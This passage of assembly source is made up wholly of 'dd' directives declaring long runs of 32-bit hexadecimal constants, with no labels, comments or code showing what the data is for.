		dd 95A59337h, 6BEF7CCAh, 0F4382DB7h, 4CBDD6C0h,	5424B83Dh
		dd 14D55DC6h, 0E28C454Ah, 0AC035954h, 57DC5F13h, 5EEB38CBh
		dd 778E4EE2h, 0D46347BDh, 5C3574C1h, 0EE0D7FD8h, 44F05669h
		dd 968EF635h, 4586B5C2h, 3CDADF96h, 882E7889h, 1659DBBFh
		dd 0BF8262B0h, 0F2D94B77h, 571BC6F1h, 0CD0FDB5h, 30D5471Eh
		dd 0E7A90363h, 83EAF7D4h, 2E5EEC0Bh, 0DAE1563Fh, 6593BF03h
		dd 39C67CD6h, 0FF744928h, 1940B6E7h, 461A755Bh,	2FDC918Eh
		dd 748A5E5Bh, 53DFC5C1h, 0A957D296h, 0B3B12BB6h, 0F2CA4E61h
		dd 44E755D4h, 29969D9Fh, 0D6CD956Dh, 892F899Eh,	8EB5BB58h
		dd 0D3C3741Eh, 97AD0905h, 0D597A699h, 0C6232CC2h, 5F734D9Ch
		dd 0AB92FFDh, 0E2BDA80Dh, 2B2EB9E4h, 1A2F44DCh,	0CB1EF593h
		dd 94E9974Bh, 7E17642Fh, 7A4EC71Fh, 130C3B7Eh, 0DCF5D685h
		dd 842629DBh, 0EE23E7D0h, 64946FC0h, 0D94A4975h, 87039D50h
		dd 0D2F568FDh, 900BE8ACh, 1C2BBE06h, 0CCF3D3Ch,	0C378D03Eh
		dd 2FD19EF0h, 16C15D54h, 0BE545509h, 536BF217h,	0E3B55631h
		dd 59CE1E87h, 4F8D1967h, 0E07DAB2Bh, 86AA528Bh,	0C727767Ch
		dd 292C5C5Fh, 0C8B4E5F6h, 33E1F790h, 4C5DE70Bh,	5D84D6DFh
		dd 43A431D2h, 0D4E6059Fh, 0D8FBBA83h, 67EED746h, 41382E94h
		dd 0EEBC52EAh, 2C9025D7h, 5C2EB67Fh, 26E66442h,	9870FB30h
		dd 0A697415Eh, 527779F1h, 7BF2491Fh, 0A16C0342h, 2D64C43Eh
		dd 368EDBFEh, 6D46716Ah, 9016E42h, 0D73556BBh, 43F099F2h
		dd 4CD4E3B3h, 0CCBB54D5h, 9C1B2F80h, 688BB2ECh,	0DC75A3F2h
		dd 0E854B8CAh, 8D7E662Ah, 0CF7D2AF6h, 81DD71Fh,	3DBC8BCh
		dd 9A508437h, 8F12FA34h, 6C6CE539h, 0B676E266h,	1AAB4CECh
		dd 27BB4A23h, 0A766BB55h, 251A39C4h, 39D7DA17h,	0C24528B7h
		dd 0B6389C7Eh, 50E2F68Fh, 0DBC79DD7h, 0AA588587h, 0E977B11h
		dd 0B1541EBDh, 90DAC8CCh, 54955B3Bh, 53442B5Ah,	6B637AFEh
		dd 2C96B54Dh, 0B385EFF7h, 5AE18554h, 6396E850h,	91F0671Bh
		dd 0DB2B8D5Ch, 5D0DDEB9h, 0DBCA986Ah, 233A5599h, 8499655Ch
		dd 4676755Eh, 3D47D716h, 9152B64Ah, 0A2A074BCh,	0FA3FBC85h
		dd 4D07502Bh, 50F49625h, 62E05D1Bh, 0DCEEE363h,	8EA35381h
		dd 7B78B419h, 40CEF03Fh, 3CFAAFC4h, 0A9616503h,	0BF949160h
		dd 83010BE3h, 5FE2DF9Bh, 599CE144h, 0AAA8C789h,	82B998AAh
		dd 0C3466DA4h, 5A4068CBh, 13FD1E3Dh, 6079DCCDh,	0CCE39EF7h
		dd 0B24A1FCFh, 0D1A646CAh, 8716DF53h, 0F03F1295h, 0F30DF8CAh
		dd 0CE926D3Eh, 15C0C52Fh, 6E20E42Eh, 29F43083h,	0B59DBCA4h
		dd 25BE9F5Eh, 0DB1532A3h, 9B144A99h, 53F9ADDBh,	0C8177469h
		dd 0D32B68A9h, 0AC0C9306h, 42A8E5F2h, 6B9836BEh, 85F25BE5h
		dd 73DAC5F1h, 0EC631A1h, 0D97D2928h, 8B027D14h,	0B687A556h
		dd 0E55FA971h, 7BD84689h, 66519C63h, 0D1D0512Bh, 1CA86B35h
		dd 0D7EF6B7h, 0F0EF4A8h, 3710733Ch, 0B1D2C77h, 0DE825FE9h
		dd 920E8082h, 2C09A1E8h, 0EEEC59ECh, 2F19AF66h,	0C240D9F2h
		dd 4FC0541Ch, 7A3A3925h, 0D186F2FDh, 14775D9Ah,	0A8DEA8D1h
		dd 73D7E836h, 4B4B118Fh, 0D3747FBh, 6108FC1Ah, 0CEBB5D36h
		dd 2905EEB2h, 0B33928D1h, 8ED239A6h, 0D7C2935Ch, 0ECBA0886h
		dd 5328D64h, 79BF51C9h,	0B669CAEBh, 2D150D2Ah, 38347FC7h
		dd 0A345EF33h, 7A50BA8Dh, 0F2FACF25h, 0FC9D6620h, 0A5B32122h
		dd 557331DDh, 0CF29EFC1h, 0A0CC8A6Bh, 0E65AE3ACh, 707BA38Fh
		dd 8137D5CBh, 0B48C2F84h, 0B339779Dh, 2B396D80h, 0B1AD4F44h
		dd 0BFF5BF21h, 3F941834h, 0F5CA675Dh, 5A0D09B2h, 0DB12A40Ah
		dd 55589BEDh, 43708D9Ah, 4DEBC18Bh, 1D0E3C18h, 7D3CEBC2h
		dd 0CA559667h, 0E1B775E6h, 0AB668F00h, 0FDF2C9D4h, 71F17EC5h
		dd 0FA016DA7h, 0D5F32AA7h, 2DB6C2ACh, 59529688h, 287E7671h
		dd 621FAEDEh, 0A5CE37BBh, 0B86A3A6Dh, 0F87AAE4h, 0BDF2573Ch
		dd 83964D94h, 4188F0BEh, 23762B76h, 0B59D227Dh,	6EA55A09h
		dd 32EF45Eh, 4A2D132Fh,	2A8A337h, 1F571BFAh, 0DA9D9998h
		dd 74EA3E21h, 72C917E5h, 65189C7Dh, 0AD35F5B1h,	629C368h
		dd 5861A742h, 1E11C7C9h, 2CADAAEFh, 3F7B3966h, 42FE743Eh
		dd 2229EA79h, 0A877A76h, 0FC594603h, 74B2B27Fh,	0F773EA6Ah
		dd 0A536D1CFh, 9C521BB7h, 0E58C40D4h, 0B1F3EBB8h, 0E276CBE9h
		dd 75567A48h, 42586FD5h, 0FFE4A5B3h, 0AC93AF55h, 29F32DD6h
		dd 0B813C1E8h, 1AE68B5Eh, 0BFA99E76h, 6A4B14D2h, 2E23E52Ch
		dd 833A0F58h, 87C4D71Fh, 384E4787h, 0B49DD3DAh,	719EEC0Ch
		dd 5BB75DE5h, 15FEC6EFh, 0BF91667Eh, 188641ADh,	0CB46D909h
		dd 0D93031F7h, 0CC6A0919h, 382D48E2h, 1E9A3BF3h, 2DB184B4h
		dd 6134D565h, 20B937D3h, 0F34A41E1h, 2A529E44h,	95F5A14h
		dd 43C96659h, 11B74F7Bh, 0DE79C563h, 29C12F8h, 4FF25486h
		dd 696E8844h, 0F0EDEFF5h, 0F53BF4EBh, 0E71468F3h, 0F3734617h
		dd 5CEB80BFh, 0FCB919BBh, 3F173212h, 0EFDFDC22h, 591C2FE3h
		dd 8E53EF0Ch, 0EABC3D0Eh, 0F6CCF951h, 0C2D306D7h, 607CC9DFh
		dd 1633EFAFh, 0ED90D0DBh, 3F0F585Fh, 0D72C88DCh, 73F6AD9Ch
		dd 0BAEDD852h, 482D1FBBh, 0ACEE0812h, 70CCEBDEh, 8AB199D6h
		dd 0B6409D7Bh, 0A48D189Dh, 8287C88Dh, 2D9BB956h, 0ED17B5Ah
		dd 2B0B387Eh, 0D09F207Bh, 9C6F77F6h, 0E2FAAA91h, 0C2730DB8h
		dd 88E8A5C5h, 1B41CB2Fh, 2F26E37Fh, 0B32F489Dh,	5A330C24h
		dd 29A5B26Fh, 0D5CD099h, 6927F850h, 0AA00362Dh,	6CFD4A92h
		dd 4B46043Fh, 0B28AE79Eh, 0F677DF94h, 10539B05h, 0DADE0B54h
		dd 0EB9E311Eh, 0DB203170h, 5963472Eh, 8CA3A489h, 84964677h
		dd 55E89CADh, 885FE07Ch, 0B460EC57h, 0B764E57Fh, 0AFF9EC6Bh
		dd 0C18D80BBh, 4E0FBAB5h, 0ABE254DCh, 0E66ABA2Ah, 0BFD76274h
		dd 8E0D3BE6h, 0CCD2FA01h, 4E5A7A69h, 0D9B8ABDBh, 0B9CA3EA4h
		dd 0F9CF6876h, 0D4E26CB5h, 87A7FA2Eh, 0BD7C7AA9h, 190F8314h
		dd 0DD0D15F4h, 0F0A11F19h
		dd 765B5CE0h, 269779D7h, 0D39AA5FBh, 0DE19FCC0h, 6F09E2E6h
		dd 511193AEh, 0C5FC38EDh, 99142B99h, 575249D1h,	99969C48h
		dd 0D23B9740h, 0CDC569D9h, 20B0E754h, 0B63BD9B9h, 6A4A9E1Ah
		dd 0D19777A8h, 5C535742h, 5D47A507h, 0F73FFD87h, 4694613Ch
		dd 9F3A5DDh, 2D868EC4h,	0C25898h, 0BDBE59A6h, 178CADE5h
		dd 6D8833B6h, 0B0FCCD81h, 84D0EAE4h, 0F7784F53h, 760BF374h
		dd 0E2DE1EB4h, 0C6A1D0DEh, 0A79707EBh, 4563C0A1h, 8D344E31h
		dd 0D6A067A1h, 0F0339E45h, 5C095253h, 8E2155F4h, 0E746EE32h
		dd 0D08E8548h, 2B5ED15Dh, 0C14DC1Ah, 0A6FA5346h, 6B3CFA14h
		dd 9EAF3FD4h, 67F4490Eh, 6DB48D4Ah, 0BB9DEF78h,	0E3172B43h
		dd 0B4BDB864h, 0B1B46722h, 59ABCCB6h, 47CA66A0h, 0A8D54EF1h
		dd 0D22EFC26h, 0C23BD5F9h, 2C3D8DC5h, 0C59BDFE6h, 0A6851839h
		dd 0B8D91A86h, 60A7FFB9h, 0F2C5B66Bh, 772EE88Ah, 47D778E3h
		dd 7B05520Fh, 0AA43FB57h, 4CEA0A4h, 0E633E6F8h,	55929C10h
		dd 1CC1455Ch, 0CE95B4D9h, 0C9FE7066h, 3E524CEEh, 8F78567Dh
		dd 2F9D7B6Eh, 0EF221320h, 0EEFB0F04h, 0D53D7781h, 44670B64h
		dd 47A87BDFh, 6546A0ADh, 2315B484h, 0A6EA5079h,	640F02D3h
		dd 0CED4CCEAh, 957CF863h, 2AB8D362h, 0DC9B1642h, 0F126D25h
		dd 9C3625B4h, 561AB2ACh, 48878647h, 11659277h, 4F5DE2B9h
		dd 0BA8D7C1Eh, 552CDA68h, 2255A149h, 1F71638Dh,	8AA48A5h
		dd 622047E5h, 501A29F6h, 9FD61EE3h, 6BF2BDA2h, 322D5E8h
		dd 0BDABB7C4h, 0D497981Fh, 2DD001C6h, 0E8AB359Fh, 7EB06A2Eh
		dd 901EC255h, 0FF1C31E2h, 97308088h, 0D68D0469h, 392810AAh
		dd 0D15AF9Ah, 0EC9256E0h, 1F17B2C6h, 0CFB71FCDh, 0E877B0ECh
		dd 44F80654h, 0EE96A5EBh, 0CA376BA2h, 0FE783566h, 144A7875h
		dd 7F3BED92h, 4F5B142Ah, 0CE0C5E25h, 9B66077h, 0B47DC9D1h
		dd 6BCAA151h, 0CEDBAE7Eh, 0C85E90D1h, 3045D7AEh, 2B9F2685h
		dd 2466FC33h, 907404D0h, 8F387C4Eh, 17E2C459h, 0FA235351h
		dd 0D929D44Bh, 3D03218h, 665A1BEBh, 4E04187Ah, 0A4C63B7Bh
		dd 0B54FFBE5h, 87DDB882h, 2D4E407Fh, 16A4A747h,	0F07329CDh
		dd 0C6441EFBh, 0B1E6B81Dh, 57501A7Eh, 9E736C8Bh, 8871F589h
		dd 0AC968F5Eh, 5335A16Ah, 40DC4091h, 690C5B8h, 136FE2EBh
		dd 98C37021h, 0F8C0DF0Dh, 0DD4F2BF0h, 198697DEh, 856BE7A6h
		dd 4125FB70h, 2ED20AD3h, 2B5032E0h, 0DAE5350Ch,	6359EC08h
		dd 5CD57FAEh, 4AA58FB4h, 36DA5A70h, 4A94E375h, 282C50B6h
		dd 3274DE51h, 583CCA34h, 2EE9A25Bh, 69A8368Ah, 5EFF78ECh
		dd 592E6B4Ah, 9A32E8E5h, 6AB975E5h, 0F89F215Dh,	48833777h
		dd 561E4176h, 679D52AAh, 86AC5D89h, 29CB9547h, 7273AE8Fh
		dd 0FD4B86D4h, 0D26C53B8h, 75B6A31Eh, 10BF01CCh, 856BA004h
		dd 0B12C732Ah, 0BDC42BA5h, 0CF24534Ah, 555007F4h, 11F6D2B2h
		dd 0F4E7E9CEh, 93BE7DBBh, 0B260E218h, 8E6D4EE6h, 0C8557296h
		dd 59CF32ADh, 2EA53F02h, 0D6D6B93Bh, 0BAA62CA6h, 58D1AAE4h
		dd 25087DD4h, 5CA647B9h, 0CF11CEA0h, 3DB47F28h,	0BB5703DCh
		dd 33B60574h, 4AA7F955h, 2787165Dh, 7A260767h, 4B21E237h
		dd 989524DBh, 7130C5FEh, 0DC213750h, 0AD98E0F8h, 44F26B65h
		dd 0D6E7833Bh, 85E71C72h, 7A59CF29h, 8BEDA4FDh,	0F73EFD2Ah
		dd 289AA971h, 6D59D013h, 0D41C3A0Dh, 5EB9CAC7h,	208A6EEEh
		dd 737A9C7Bh, 37097662h, 65604378h, 5EB6DE36h, 956A28B4h
		dd 87E2DDA5h, 0F5D00D0Dh, 9919F617h, 5D03D520h,	0E2362F41h
		dd 5CA1D8AEh, 4153EB03h, 0E7CFE88Bh, 0BF9138E7h, 982ACFD6h
		dd 53B43965h, 0D36E22A9h, 1BBB7DFCh, 0EE98896Fh, 805C0749h
		dd 1C3B5A88h, 0AF3906D1h, 431EF4D4h, 0E3A30476h, 28DB7D16h
		dd 9E2B7D77h, 0ACAB3238h, 7C2E2D16h, 3B12A3AEh,	6591963Bh
		dd 0F07BA29Ch, 0C7B0F7C3h, 7CA05BFAh, 87F7AFB6h, 7E581085h
		dd 1145D9A5h, 2A0928A5h, 99B8BCCFh, 4FD02DE7h, 0C5526F58h
		dd 83B39F58h, 0EBD2D151h, 0D68EB4D1h, 2659B9A1h, 0FC60CC6Ah
		dd 854C489Eh, 0D0AB77B3h, 251E60A2h, 0B26312B4h, 7FA5B0F3h
		dd 532F703Dh, 182D82D9h, 5CC7D8AEh, 12396D04h, 28690593h
		dd 5922CC73h, 0EE14DE15h, 0AFCFAF3Ch, 0F055308Bh, 0FACE3B43h
		dd 0A92AF8DAh, 872D0D59h, 7D09CC12h, 0D2DC124Fh, 7AFA41CEh
		dd 3933317Fh, 3D69A303h, 59B2DFDFh, 0DD439BC2h,	1FCA3249h
		dd 4B071BAEh, 37FC2C49h, 9482265Fh, 0A7C839EDh,	78B41F89h
		dd 0C4669D64h, 590213F6h, 0AA5CCB94h, 5A57AEDFh, 21FB1E14h
		dd 7DAF15F4h, 44D9D367h, 5E09B45Eh, 95481B30h, 4BDFC166h
		dd 0C959E497h, 9A466504h, 853E3E67h, 0C793E7C2h, 62F0B236h
		dd 0E48899E6h, 63C0DAAAh, 91549DFDh, 766DE94Ch,	30A252ADh
		dd 0CB9518A0h, 0B8AFD661h, 76F0955Eh, 0BB93D4Dh, 0BADE5D3Eh
		dd 0BCFC8B63h, 7F93B3C4h, 29285774h, 32B9F772h,	15DD5274h
		dd 0D851398Eh, 0DA0661FEh, 25DBD756h, 5AC160CBh, 0CF7EDD4h
		dd 537C2B72h, 617F259Ah, 3756ABF3h, 137969ABh, 25C5E188h
		dd 0EF4AE244h, 0A8128129h, 5BB7A608h, 657CB25Dh, 949E2B94h
		dd 0F8D841F0h, 0ADDB7F81h, 0A1103FB7h, 9D2FBA9Ah, 0C50AB44Fh
		dd 0E9BE6E4h, 97B94966h, 5D757B78h, 5FD343DDh, 7E1D1BE4h
		dd 57F5F9C2h, 0E278C682h, 46517523h, 72A7BFF3h,	0E7D66115h
		dd 0AD5014DAh, 15FC0198h, 0DF6267B6h, 0BF00F8Bh, 0D9D19AE4h
		dd 2AD5A715h, 36F4154Fh, 0E30CD0B8h, 0B9132765h, 73E85E9Ch
		dd 447925CDh, 2ADEB170h, 0A4E5A611h, 0EAF6577Dh, 0C359B9E7h
		dd 94898DCEh, 2A269368h, 242A9AA3h, 0A2EEF436h,	9DA05D8Ch
		dd 18983509h, 0CD1DCAE2h, 4DBE0DA2h, 3CB35078h,	0C14A285Ch
		dd 38F61B8Dh, 0ED5AC1A2h, 597B9E8Fh, 3C7BDD6Dh,	1DA51985h
		dd 6C5978CDh, 548CE48Eh, 4DA0BD0Dh, 0CCD9439Bh,	7D2AB438h
		dd 0F3E57761h, 483119E1h, 13A4D0DAh, 0ABBD825Fh, 5140406h
		dd 475AFEA3h, 8A0FD7E0h, 16ECEB9Eh, 29A34C3Bh, 0E60DAEA7h
		dd 69D752D3h, 5F713B17h, 5C7F9F24h, 8581666Eh, 0F25683E2h
		dd 308F0C89h, 0C34A3C95h, 448B24Ch, 0A12543CFh,	0E588D24Ch
		dd 0AF914B03h, 0F55A6EA4h, 9455D3Ah, 0C3E53EDBh, 0ECD8018Ch
		dd 5DA977A0h, 78F99D39h, 0B02C360Dh, 2C74AAF7h,	0A4BD8DDDh
		dd 20E9D762h, 0A2893FDBh, 0C661F8B2h, 3E232DD0h, 0D4E368Ch
		dd 7DE5ADB1h, 0E2BE169Bh, 0AA7D9E4Ah, 2E119678h, 0B11D3B90h
		dd 4AA13EEAh, 59596DA5h, 3C9C6E4Bh, 4474681Fh, 2CB2F5D7h
		dd 7E3CFBD2h, 0C0320E61h, 0D19CA74Dh, 54F8B5E0h, 620C82EAh
		dd 7EFCF04Ah, 8A7225Eh,	0BDA51E74h, 0EFECBA37h,	8545FD7Ah
		dd 0FF7CA8DBh, 0D529E8D3h, 0DAABDE75h, 1055CB49h, 93FD3EB0h
		dd 0BBC116D6h, 741536ACh, 24C9224Ah, 0C1FD0B6Bh, 5BF732ADh
		dd 295F2471h, 0A3FD3B7h, 0AACD9620h, 9549CFFCh,	7DE18ADCh
		dd 0EF68DA9Fh, 12DCF8BBh, 0E4B7082Dh, 1758FC5Eh, 0D1ED397Ch
		dd 71BA54B7h, 0E62CD461h, 0C469AF98h, 4F819A59h, 5BF0A8FEh
		dd 7CB171Dh, 0F4FF3BB9h, 44F8F805h, 62B687FEh, 1A83E00Eh
		dd 0D65E7485h, 0BFBF8D31h, 0FBC3DD58h, 0C27C1EAEh, 10AEB25Ah
		dd 5A7CFD61h, 0A8DA9F9Dh, 0F765B276h, 0F87438B7h, 7D0CCCC0h
		dd 252B726Ah, 0DA21BFE7h, 29F994AEh, 748D2ADAh,	9F2B5887h
		dd 55FCA015h, 0EFF33C65h, 9EE0E32Fh, 0A95102EBh, 2BF4B7Fh
		dd 36E3D849h, 3A48D19Dh
		dd 8AD8BED2h, 0CA9515C9h, 0C19DF5D5h, 95D76B5Ch, 0A6D962E5h
		dd 0A07D7F52h, 475A0E71h, 59A78230h, 0EE7290BDh, 0C2B0050Eh
		dd 8CCB4509h, 0C9CD62Ah, 5CC949FFh, 2DF01EEEh, 93A8A8E4h
		dd 0F6A5F67Dh, 0BAE1ABF8h, 206F9BC8h, 14134132h, 5E80738Ah
		dd 17032B49h, 90BAF895h, 9C7B12C8h, 0A496F64Ah,	0FB70A314h
		dd 7A14A311h, 3A6A4EFCh, 0CD3B1B36h, 0F3D5AF43h, 0E1375DA8h
		dd 587E287Dh, 0ED152E38h, 0B2071FD7h, 6CAA7AF5h, 6E91CD65h
		dd 0D3632BE1h, 225EA72Dh, 39D8B0FFh, 81E1BD63h,	0F9298421h
		dd 768F367h, 5DF69E26h,	0DFDFF549h, 7C0DBAADh, 607D86FAh
		dd 2E7FCCCEh, 549876AAh, 0CC4831F7h, 7771AD05h,	92ED02C3h
		dd 9A068251h, 0FE6BCDDFh, 0D6DCB99Bh, 7E6A4D0h,	3FE94876h
		dd 0F8214BBDh, 0C17F17E5h, 56FAF7F8h, 0A768DD5Fh, 23CD4EF6h
		dd 0CC8E73DDh, 4F976174h, 0F2FF1D9Eh, 7EB822EBh, 34041282h
		dd 8BF42BFBh, 0FB737BB3h, 0DAC11B91h, 0DC84BC88h, 0E27C9C57h
		dd 0F1DA58C9h, 97151924h, 0F8905B6Bh, 8E3F9362h, 0A9882E51h
		dd 42E03BF8h, 3CA0179Dh, 88AD6B60h, 0A9D7B1A6h,	0FBF12634h
		dd 762D293Ch, 38A588AEh, 0E6C02EF7h, 52BD9F3Ah,	0D3B4763Ch
		dd 9B91AEE1h, 0E5D94659h, 0D527717Eh, 0DD9AAE43h, 0CB8C5EEh
		dd 55EDC371h, 0C64AB1E8h, 7C101849h, 0E662B0A8h, 157A4C86h
		dd 0B3E98632h, 0F19F558Ah, 0E5FB508Dh, 3AB4CD3Ah, 358F703Eh
		dd 4FD4FCCEh, 436CC305h, 4497DDDBh, 74D2D32Eh, 0CAA938B2h
		dd 234AD87Bh, 98564A9Dh, 0B31F75D8h, 93DD07DBh,	0DACE4E23h
		dd 0BCCC5556h, 6C3655E7h, 6AFCEDE1h, 0A2A9D056h, 0ACD91E7Bh
		dd 0CE37AE3h, 9041D66Ch, 0B68C9AB5h, 0B24B553Eh, 2FF54CC0h
		dd 0D76A5FFFh, 0A9EF0CD0h, 51DC823Dh, 9412F07Ch, 17ED2AADh
		dd 0CBE6FB3h, 293C94DDh, 5915C75Eh, 0DEFA6952h,	2FF6E94Eh
		dd 1F06FEFCh, 9EA58EB7h, 0E17098E5h, 2D2368BFh,	253657E5h
		dd 8FDE79A3h, 77352FF2h, 0CCE92F2Ah, 0CB8C87BAh, 7688FECFh
		dd 9E46C0F8h, 17F4964Dh, 55D8B342h, 4366D616h, 54AFC16Fh
		dd 0F638935Eh, 0BE751B45h, 31B50FA7h, 0E967CA83h, 0F0B88B9Bh
		dd 657A2732h, 0B116DB35h, 2BB926AFh, 0E0D5C42Fh, 35E61F0Ah
		dd 1684F2Ah, 0D325AF5Bh, 0AE44DF3Bh, 6322FC9h, 63B0E2ADh
		dd 1DE7B0F5h, 0BA874C62h, 0F885552Fh, 0A3037877h, 0C23E6917h
		dd 0DCFA58D5h, 0C7E718B8h, 21C8B685h, 0A8C19395h, 0CF9CE2FDh
		dd 0FAF02348h, 2E25E157h, 60E8EB9Eh, 1438981h, 0DFBBE8Fh
		dd 4CB5F445h, 41ECC6EBh, 7E4D9AB5h, 0E43C3AF2h,	5A8FF276h
		dd 0F34EF239h, 61D82971h, 15BDB2E0h, 356B74Eh, 0E7114A29h
		dd 0FB8A9193h, 0AA88F3CEh, 0BDB18590h, 700BBD98h, 926C006Fh
		dd 5373B112h, 0A675BFBh, 0F30A8379h, 0C64CFCBAh, 79AC6098h
		dd 4ABEEBBAh, 5576DA8Ch, 25EEA98Ah, 51685DCCh, 0E221D48Dh
		dd 4358C882h, 50962F82h, 87989624h, 10FCBAC7h, 12EFE2E3h
		dd 15B53743h, 0DFA03184h, 0F8BE742Bh, 0DA4F2E84h, 0D6545401h
		dd 0A0C2FB6h, 13654B09h, 82D3D552h, 3D8771DFh, 7CFA824Ah
		dd 0EAB2F9E0h, 0D4A7E816h, 0ADFFA905h, 0C796FAFCh, 1C1EB2CFh
		dd 8D237CF0h, 85FF140Dh, 32D4674Eh, 66461A44h, 0FE653EC9h
		dd 5D27C8E4h, 3BB2440h,	0ACB61705h, 0A5C79936h,	1BD5FF4Ah
		dd 5FDF39FBh, 2F937F24h, 0B36E4C2Dh, 0ED8717E3h, 387F64ECh
		dd 8558358Fh, 8118C736h, 6C0C73CCh, 0F99C5F04h,	0E5DD3870h
		dd 86F1A6E4h, 0A2B96DB9h, 90BC957Fh, 65731190h,	1ED1A25Dh
		dd 34285C4Ch, 3812B2C8h, 973DD8C2h, 9C67BAFEh, 6A016DA2h
		dd 219D5566h, 0A2495F16h, 40E340C5h, 89B505A3h,	6C494A40h
		dd 52CDDF31h, 20D86833h, 0A970E85h, 6D0D7C8Fh, 0F88ACBB6h
		dd 0B82B7EA3h, 92536739h, 1C967CAEh, 55E7CD39h,	57DA5351h
		dd 0C0F6EA74h, 0EECC3DCDh, 30FBF14h, 9B5AAD78h,	2A04F07Bh
		dd 86AADF02h, 0F9D894D8h, 7DCFA2C8h, 65A0C223h,	6568EE6Fh
		dd 0E01D6E8Eh, 3323EFBAh, 0E2B82FEDh, 2BD630C6h, 80A2884Bh
		dd 654455FBh, 0D9122F85h, 0A6FF3CB5h, 0D95BB465h, 584819C3h
		dd 68D1607Ch, 8552DE26h, 0F355C1D8h, 0C5B9A6B0h, 84ABC5C1h
		dd 1614AA99h, 2EFD9F50h, 7F16087Eh, 96380A05h, 0DF6DB8A4h
		dd 0FB36B1D4h, 0C11E8BF9h, 91640631h, 0B0B05C6Fh, 975B2D2Ah
		dd 5D0BB0F8h, 0FD78BABh, 0B203A45Fh, 0E29A5517h, 1D15F485h
		dd 8A97B41Bh, 0F862FED3h, 6B4549E7h, 121DECA5h,	13BBE785h
		dd 5A02496Eh, 35F47E57h, 5DB9A378h, 0EFE45842h,	9CAD6607h
		dd 0B22790FFh, 1AAB2A5Bh, 7C1E5157h, 9D6811BFh,	1306571Eh
		dd 7DFDFE0Bh, 0A89AC0F3h, 43369EB2h, 3B7DDD5Eh,	0D97485F3h
		dd 0DE1398A9h, 3A324DCAh, 26E24E0Fh, 7B03B8F4h,	0C21F8953h
		dd 0F5D44CDFh, 447C889Ah, 44F8CEEDh, 0DE37207Ah, 0DDDEB109h
		dd 4B7D68D4h, 0DA3EA8BFh, 4E3CD5F8h, 52D20571h,	82E7157Eh
		dd 69954108h, 0ADC974ECh, 9E23986Dh, 6BA86B34h,	0C28CAAAFh
		dd 6C6AAF1h, 3A68FC12h,	5A7BA73Eh, 3B44BF8Ch, 99F8769Ch
		dd 97F2FF45h, 717EAC3Eh, 96DDC5Ah, 0AF7E5762h, 0F4627650h
		dd 56197F16h, 0ED6C4439h, 0E17F1834h, 89AA1228h, 87BA9727h
		dd 0CAB3E581h, 0BBDFA999h, 9BB9145Ch, 713385A6h, 86716675h
		dd 4958E179h, 0ACF4D649h, 6EF6B1AAh, 0B4515B87h, 0FB02F51Bh
		dd 9F2F2FB4h, 9281F786h, 6D695AAFh, 7DD61674h, 607793CBh
		dd 4C7BD5B1h, 18A16F7Ch, 8FFCFF2Fh, 6F926E8Fh, 0C9C610BFh
		dd 18D8BA98h, 440FA0AEh, 0D045FF33h, 0C6ED6529h, 0E0F8B3CAh
		dd 0F69678E6h, 6A838ABDh, 274527C1h, 0FA49CE81h, 83FCCC55h
		dd 719A8B46h, 0F9D58DF7h, 4F3683DAh, 0FC59669Bh, 0EB9E3FD6h
		dd 0E467D3DBh, 0AB968176h, 9A4E7A2Ch, 83EE07D8h, 0CE62F49Fh
		dd 7B038CCCh, 52875DB3h, 0D9C5105Eh, 2F68DEF7h,	8EF7EE81h
		dd 0B55709C7h, 771D24FEh, 6595080Ch, 6D663739h,	456D411Dh
		dd 5B463DDDh, 0F3B1A2F5h, 998FB7ABh, 17F8A85Eh,	7BEA5070h
		dd 0C7EB79B2h, 43D2617Fh, 0D7F9C461h, 95BAF5C2h, 355C88D0h
		dd 19698EF8h, 6A8D8C00h, 8B24B415h, 3EB6ED81h, 0AF2F1A1Eh
		dd 56A31F0Bh, 0B0F8EB34h, 97970868h, 7DD974A2h,	15D1C80Ah
		dd 0ADE6C74Dh, 678D7FC7h, 0FB17416Bh, 14CADDA4h, 0CA44539Eh
		dd 0C27544D5h, 26B6678Ah, 3C8E9D2Fh, 29E1C830h,	0FB595FAFh
		dd 97B76250h, 66CF7450h, 76690699h, 3B03FCE7h, 0D5D4FCBBh
		dd 6E84E1D6h, 5747B667h, 0B715553h, 0F55DDD89h,	0B550A3FBh
		dd 22DF1923h, 0E325675Dh, 5EAB2714h, 747A22DBh,	0CEA84F87h
		dd 0EAB18DEFh, 0BA4F2457h, 16DCEDEh, 0EBB6209Ah, 17A10B28h
		dd 45C702D5h, 826826A7h, 0E7CF301h, 811325B7h, 2297378Ah
		dd 0ED9057BAh, 55488E77h, 0DB1A9C7Fh, 85D40D95h, 64544B0Ah
		dd 67D2BBE0h, 79A0962h,	0E8B9BE87h, 37D7C791h, 14FDD6A4h
		dd 0F847B99h, 8CF71896h, 0D8DACCE1h, 0EF0C319Ch, 0F44E8607h
		dd 11F69767h, 1B86B15Dh, 4B868CE4h, 7EAE0C7Bh, 1D0A2D7Ah
		dd 5E61F9C3h, 234C2E4h,	0FE82374Dh, 0B849FEB8h,	5710962Ah
		dd 0EC745B85h, 51EAAA83h, 0AAFFCAFAh, 57F16C11h, 0AD927E1Fh
		dd 0B5D4BEF9h, 3E3755A7h, 4F1FCED7h, 9FFC9646h,	0C325CF85h
		dd 0D36B17FDh, 37F11B16h, 466655Ah, 1D8D99F6h, 6E0771E7h
		dd 1266A1B4h, 53253371h, 58170B1Dh, 0A7564AEEh,	74F7F4B9h
		dd 0F85818D9h, 0DE415A6Ch
		dd 0D155A1EDh, 0B51AD3E5h, 556507D8h, 0F11AB2F4h, 0E99F8943h
		dd 9B7DDEB2h, 0C4B54ECAh, 0C74A71A9h, 0C1CE5766h, 0A8E3B601h
		dd 9223FAA1h, 10813574h, 0F77D0AEBh, 574C6F39h,	4587AA3Bh
		dd 0C2D8141Eh, 412403DDh, 5AADEC4Ch, 0F342FAC1h, 1E05D618h
		dd 455B7DB7h, 5A9C3BFEh, 97F78F8Fh, 0B4692188h,	9CA28351h
		dd 0A03C67FAh, 0AA7CF960h, 0EFDCF4CCh, 0CE2A41BDh, 783C4F0Ch
		dd 0A4691455h, 0EA7C2E5Ah, 0A28EF7E5h, 0AE53ED4Bh, 0B051A66h
		dd 6C5201ACh, 0BCE8A347h, 0E0A2544Bh, 0AD23AC97h, 15ACCC5h
		dd 1F81056Bh, 4C1ABD36h, 6B46BCEBh, 0FD6B5176h,	0BF7AE95Ah
		dd 6CE6D4E1h, 8D43FD34h, 0DC1EF02Ah, 3E65225h, 271A344Bh
		dd 7524BA72h, 78095024h, 0D12DB233h, 5521281Dh,	86E53DAAh
		dd 0AA3A5F87h, 7690D8D0h, 0A51A7C2Dh, 449D3A76h, 0E7A2C6AAh
